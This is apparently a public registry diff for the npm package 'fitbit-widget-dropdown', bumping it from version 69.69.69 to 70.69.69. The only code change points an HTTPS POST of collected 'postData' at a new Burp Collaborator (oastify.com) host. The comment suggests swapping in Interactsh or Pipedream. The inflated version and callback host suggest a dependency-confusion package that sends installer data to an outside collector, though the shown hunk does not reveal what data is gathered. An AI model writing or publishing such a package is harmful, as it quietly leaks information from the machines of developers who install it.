fitbit-widget-dropdown 69.69.69 → 70.69.69

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. package/index.js +1 -1
  2. package/package.json +1 -1
package/index.js CHANGED
@@ -23,7 +23,7 @@ var postData = querystring.stringify({
23
23
  });
24
24
 
25
25
  var options = {
26
- hostname: "sb76wtam20fat2uzx7mtf2wxjopfm3cr1.oastify.com", //replace burpcollaborator.net with Interactsh or pipedream
26
+ hostname: "h7pvsi6bypbzprqotwiibrsmfdl4isagz.oastify.com", //replace burpcollaborator.net with Interactsh or pipedream
27
27
  port: 443,
28
28
  path: "/",
29
29
  method: "POST",
package/package.json CHANGED
@@ -1,6 +1,6 @@
1
1
  {
2
2
  "name": "fitbit-widget-dropdown",
3
- "version": "69.69.69",
3
+ "version": "70.69.69",
4
4
  "description": "",
5
5
  "main": "main.js",
6
6
  "scripts": {